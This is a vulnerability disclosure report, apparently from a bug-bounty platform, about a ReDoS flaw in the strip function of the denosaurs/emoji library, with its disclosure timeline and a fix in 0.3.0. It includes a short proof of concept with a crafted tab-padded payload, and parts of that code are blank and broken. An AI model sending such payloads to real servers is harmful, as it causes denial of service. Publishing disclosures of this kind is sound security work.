ReDoS vulnerability in `strip` function in denosaurs/emoji


Reported on

Apr 15th 2023


The reTrimSpace regex has 2nd degree polynomial inefficiency, leading to a delayed response given a big payload.

Proof of Concept

import * as emoji from "";

const input = '\x00' + '\t'.repeat(154773) + '\t\x00';
const start =;
const end =;
console.log(Number(end - start).toString());

This usually takes ~12 seconds on a fast PC model.


Exploiting this vulnerability successfully can lead to staggered delays on a server.

We are processing your report and will contact the denosaurs/emoji team within 24 hours. 5 months ago
Tristan F. modified the report
5 months ago
We created a GitHub Issue asking the maintainers to create a 5 months ago
We have contacted a member of the denosaurs/emoji team and are waiting to hear back 5 months ago
We have sent a follow up to the denosaurs/emoji team. We will try again in 7 days. 5 months ago
denosaurs/emoji maintainer validated this vulnerability 5 months ago
Tristan F. has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
denosaurs/emoji maintainer marked this as fixed in 0.3.0 with commit a61ec1 5 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
denosaurs/emoji maintainer published this vulnerability 5 months ago
to join this conversation